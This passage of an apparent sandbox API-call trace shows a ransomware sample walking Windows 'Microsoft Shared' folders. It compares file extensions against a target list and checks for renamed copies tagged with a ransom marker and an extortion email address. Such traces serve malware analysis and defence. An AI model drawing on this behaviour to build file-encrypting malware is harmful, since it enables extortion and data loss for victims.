out: hHeap=0x600000) returned 1 [0052.757] CloseHandle (hObject=0x190) returned 1 [0052.757] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0052.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0052.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0052.758] lstrlenW (lpString=".doc") returned 4 [0052.758] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0052.758] lstrlenW (lpString=".docx") returned 5 [0052.758] lstrcmpiW (lpString1=".docx", lpString2="5.DLL") returned -1 [0052.758] lstrlenW (lpString=".pdf") returned 4 [0052.758] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0052.758] lstrlenW (lpString=".xls") returned 4 [0052.758] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0052.758] lstrlenW (lpString=".xlsx") returned 5 [0052.758] lstrcmpiW (lpString1=".xlsx", lpString2="5.DLL") returned -1 [0052.758] lstrlenW (lpString=".ppt") returned 4 [0052.758] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0052.758] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0052.758] lstrlenW (lpString=".zip") returned 4 [0052.758] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0052.758] lstrlenW (lpString=".rar") returned 4 [0052.758] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0052.758] lstrlenW (lpString=".bz2") returned 4 [0052.758] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0052.758] lstrlenW (lpString=".7z") returned 3 [0052.758] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0052.758] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0052.758] lstrlenW (lpString=".dbf") returned 4 [0052.758] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0052.758] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0052.758] lstrlenW (lpString=".1cd") returned 4 [0052.758] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0052.758] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0052.758] lstrlenW (lpString=".jpg") returned 4 [0052.758] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0052.758] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0052.758] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0052.758] lstrlenW (lpString=".doc") returned 4 [0052.758] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0052.758] lstrlenW (lpString=".docx") returned 5 [0052.758] lstrcmpiW (lpString1=".docx", lpString2="5.DLL") returned -1 [0052.759] lstrlenW (lpString=".pdf") returned 4 [0052.759] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0052.759] lstrlenW (lpString=".xls") returned 4 [0052.759] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0052.759] lstrlenW (lpString=".xlsx") returned 5 [0052.759] lstrcmpiW (lpString1=".xlsx", lpString2="5.DLL") returned -1 [0052.759] lstrlenW (lpString=".ppt") returned 4 [0052.759] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0052.759] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0052.759] lstrlenW (lpString=".zip") returned 4 [0052.759] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0052.759] lstrlenW (lpString=".rar") returned 4 [0052.759] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0052.759] lstrlenW (lpString=".bz2") returned 4 [0052.759] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0052.759] lstrlenW (lpString=".7z") returned 3 [0052.759] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0052.759] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0052.759] lstrlenW (lpString=".dbf") returned 4 [0052.759] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0052.759] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0052.762] lstrlenW (lpString=".1cd") returned 4 [0052.762] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0052.762] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0052.762] lstrlenW (lpString=".jpg") returned 4 [0052.762] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0052.762] lstrcmpiW (lpString1=".mui", lpString2=".cry") returned 1 [0052.762] lstrlenW (lpString="InkObj.dll.mui") returned 14 [0052.762] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkObj.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkobj.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0052.995] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x329ff1c | out: lpFileSize=0x329ff1c*=4608) returned 1 [0052.995] CloseHandle (hObject=0x194) returned 1 [0052.995] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkObj.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkobj.dll.mui")) returned 0x20 [0052.995] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkObj.dll.mui.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkobj.dll.mui.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0052.996] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkObj.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkobj.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0052.996] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkObj.dll.mui") returned 71 [0052.996] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkObj.dll.mui") returned 71 [0052.996] lstrlenW (lpString=".doc") returned 4 [0052.996] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0052.996] lstrlenW (lpString=".docx") returned 5 [0052.996] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0052.996] lstrlenW (lpString=".pdf") returned 4 [0052.996] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0052.996] lstrlenW (lpString=".xls") returned 4 [0052.996] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0052.996] lstrlenW (lpString=".xlsx") returned 5 [0052.996] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0052.996] lstrlenW (lpString=".ppt") returned 4 [0052.996] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0052.996] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkObj.dll.mui") returned 71 [0052.996] lstrlenW (lpString=".zip") returned 4 [0052.996] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0052.996] lstrlenW (lpString=".rar") returned 4 [0052.996] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0052.996] lstrlenW (lpString=".bz2") returned 4 [0052.996] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0052.996] lstrlenW (lpString=".7z") returned 3 [0052.996] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0052.996] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkObj.dll.mui") returned 71 [0052.996] lstrlenW (lpString=".dbf") returned 4 [0052.996] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0052.996] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkObj.dll.mui") returned 71 [0052.996] lstrlenW (lpString=".1cd") returned 4 [0052.996] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0052.996] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkObj.dll.mui") returned 71 [0052.996] lstrlenW (lpString=".jpg") returned 4 [0052.996] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0052.996] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkObj.dll.mui") returned 71 [0052.996] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkObj.dll.mui") returned 71 [0052.997] lstrlenW (lpString=".doc") returned 4 [0052.997] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0052.997] lstrlenW (lpString=".docx") returned 5 [0052.997] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0052.997] lstrlenW (lpString=".pdf") returned 4 [0052.997] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0052.997] lstrlenW (lpString=".xls") returned 4 [0052.997] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0052.997] lstrlenW (lpString=".xlsx") returned 5 [0052.997] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0052.997] lstrlenW (lpString=".ppt") returned 4 [0052.997] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0052.997] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkObj.dll.mui") returned 71 [0052.997] lstrlenW (lpString=".zip") returned 4 [0052.997] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0052.997] lstrlenW (lpString=".rar") returned 4 [0052.997] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0052.997] lstrlenW (lpString=".bz2") returned 4 [0052.997] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0052.997] lstrlenW (lpString=".7z") returned 3 [0052.997] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0052.997] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkObj.dll.mui") returned 71 [0052.997] lstrlenW (lpString=".dbf") returned 4 [0052.997] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0052.997] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkObj.dll.mui") returned 71 [0052.997] lstrlenW (lpString=".1cd") returned 4 [0052.997] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0052.997] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkObj.dll.mui") returned 71 [0052.997] lstrlenW (lpString=".jpg") returned 4 [0052.997] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0052.997] lstrcmpiW (lpString1=".mui", lpString2=".cry") returned 1 [0052.997] lstrlenW (lpString="TipBand.dll.mui") returned 15 [0052.997] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipband.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0053.059] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x329ff1c | out: lpFileSize=0x329ff1c*=3072) returned 1 [0053.059] CloseHandle (hObject=0x1c4) returned 1 [0053.059] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipband.dll.mui")) returned 0x20 [0053.059] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipband.dll.mui.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0053.059] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipband.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0053.059] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui") returned 72 [0053.059] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui") returned 72 [0053.059] lstrlenW (lpString=".doc") returned 4 [0053.059] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0053.060] lstrlenW (lpString=".docx") returned 5 [0053.060] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0053.060] lstrlenW (lpString=".pdf") returned 4 [0053.060] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0053.060] lstrlenW (lpString=".xls") returned 4 [0053.060] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0053.060] lstrlenW (lpString=".xlsx") returned 5 [0053.060] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0053.060] lstrlenW (lpString=".ppt") returned 4 [0053.060] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0053.060] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui") returned 72 [0053.060] lstrlenW (lpString=".zip") returned 4 [0053.060] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0053.060] lstrlenW (lpString=".rar") returned 4 [0053.060] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0053.060] lstrlenW (lpString=".bz2") returned 4 [0053.060] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0053.060] lstrlenW (lpString=".7z") returned 3 [0053.060] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0053.060] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui") returned 72 [0053.060] lstrlenW (lpString=".dbf") returned 4 [0053.060] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0053.060] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui") returned 72 [0053.060] lstrlenW (lpString=".1cd") returned 4 [0053.060] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0053.060] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui") returned 72 [0053.060] lstrlenW (lpString=".jpg") returned 4 [0053.060] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0053.060] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui") returned 72 [0053.060] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui") returned 72 [0053.060] lstrlenW (lpString=".doc") returned 4 [0053.060] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0053.060] lstrlenW (lpString=".docx") returned 5 [0053.060] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0053.060] lstrlenW (lpString=".pdf") returned 4 [0053.060] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0053.060] lstrlenW (lpString=".xls") returned 4 [0053.061] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0053.061] lstrlenW (lpString=".xlsx") returned 5 [0053.061] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0053.061] lstrlenW (lpString=".ppt") returned 4 [0053.061] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0053.061] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui") returned 72 [0053.061] lstrlenW (lpString=".zip") returned 4 [0053.061] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0053.061] lstrlenW (lpString=".rar") returned 4 [0053.061] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0053.061] lstrlenW (lpString=".bz2") returned 4 [0053.061] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0053.061] lstrlenW (lpString=".7z") returned 3 [0053.061] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0053.061] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui") returned 72 [0053.061] lstrlenW (lpString=".dbf") returned 4 [0053.061] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0053.061] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui") returned 72 [0053.061] lstrlenW (lpString=".1cd") returned 4 [0053.061] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0053.061] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui") returned 72 [0053.061] lstrlenW (lpString=".jpg") returned 4 [0053.061] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0053.061] lstrcmpiW (lpString1=".mui", lpString2=".cry") returned 1 [0053.061] lstrlenW (lpString="msinfo32.exe.mui") returned 16 [0053.061] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0053.062] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x329ff1c | out: lpFileSize=0x329ff1c*=26624) returned 1 [0053.062] CloseHandle (hObject=0x1c4) returned 1 [0053.062] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui")) returned 0x20 [0053.062] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0053.062] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0053.062] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0053.062] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0053.062] lstrlenW (lpString=".doc") returned 4 [0053.062] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0053.062] lstrlenW (lpString=".docx") returned 5 [0053.062] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0053.062] lstrlenW (lpString=".pdf") returned 4 [0053.062] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0053.062] lstrlenW (lpString=".xls") returned 4 [0053.062] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0053.062] lstrlenW (lpString=".xlsx") returned 5 [0053.062] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0053.062] lstrlenW (lpString=".ppt") returned 4 [0053.062] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0053.062] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0053.062] lstrlenW (lpString=".zip") returned 4 [0053.062] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0053.062] lstrlenW (lpString=".rar") returned 4 [0053.062] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0053.062] lstrlenW (lpString=".bz2") returned 4 [0053.062] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0053.063] lstrlenW (lpString=".7z") returned 3 [0053.063] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0053.063] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0053.063] lstrlenW (lpString=".dbf") returned 4 [0053.063] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0053.063] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0053.063] lstrlenW (lpString=".1cd") returned 4 [0053.063] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0053.063] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0053.063] lstrlenW (lpString=".jpg") returned 4 [0053.063] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0053.063] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0053.063] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0053.063] lstrlenW (lpString=".doc") returned 4 [0053.063] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0053.063] lstrlenW (lpString=".docx") returned 5 [0053.063] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0053.063] lstrlenW (lpString=".pdf") returned 4 [0053.063] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0053.063] lstrlenW (lpString=".xls") returned 4 [0053.063] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0053.063] lstrlenW (lpString=".xlsx") returned 5 [0053.063] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0053.063] lstrlenW (lpString=".ppt") returned 4 [0053.063] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0053.063] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0053.063] lstrlenW (lpString=".zip") returned 4 [0053.063] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0053.063] lstrlenW (lpString=".rar") returned 4 [0053.063] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0053.063] lstrlenW (lpString=".bz2") returned 4 [0053.063] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0053.063] lstrlenW (lpString=".7z") returned 3 [0053.063] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0053.063] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0053.063] lstrlenW (lpString=".dbf") returned 4 [0053.063] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0053.064] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0053.064] lstrlenW (lpString=".1cd") returned 4 [0053.064] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0053.064] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0053.064] lstrlenW (lpString=".jpg") returned 4 [0053.064] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0053.064] lstrcmpiW (lpString1=".exe", lpString2=".cry") returned 1 [0053.064] lstrlenW (lpString="msinfo32.exe") returned 12 [0053.064] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\msinfo32.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0053.064] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x329ff1c | out: lpFileSize=0x329ff1c*=378880) returned 1 [0053.064] CloseHandle (hObject=0x1c4) returned 1 [0053.064] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\msinfo32.exe")) returned 0x20 [0053.064] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\msinfo32.exe.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0053.064] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\msinfo32.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0053.064] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0053.065] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0053.065] lstrlenW (lpString=".doc") returned 4 [0053.065] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0053.065] lstrlenW (lpString=".docx") returned 5 [0053.065] lstrcmpiW (lpString1=".docx", lpString2="2.exe") returned -1 [0053.065] lstrlenW (lpString=".pdf") returned 4 [0053.065] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0053.065] lstrlenW (lpString=".xls") returned 4 [0053.065] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0053.065] lstrlenW (lpString=".xlsx") returned 5 [0053.065] lstrcmpiW (lpString1=".xlsx", lpString2="2.exe") returned -1 [0053.078] lstrlenW (lpString=".ppt") returned 4 [0053.078] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0053.078] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0053.078] lstrlenW (lpString=".zip") returned 4 [0053.078] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0053.078] lstrlenW (lpString=".rar") returned 4 [0053.078] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0053.078] lstrlenW (lpString=".bz2") returned 4 [0053.078] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0053.078] lstrlenW (lpString=".7z") returned 3 [0053.079] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0053.079] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0053.079] lstrlenW (lpString=".dbf") returned 4 [0053.079] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0053.079] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0053.079] lstrlenW (lpString=".1cd") returned 4 [0053.079] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0053.079] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0053.079] lstrlenW (lpString=".jpg") returned 4 [0053.079] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0053.079] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft 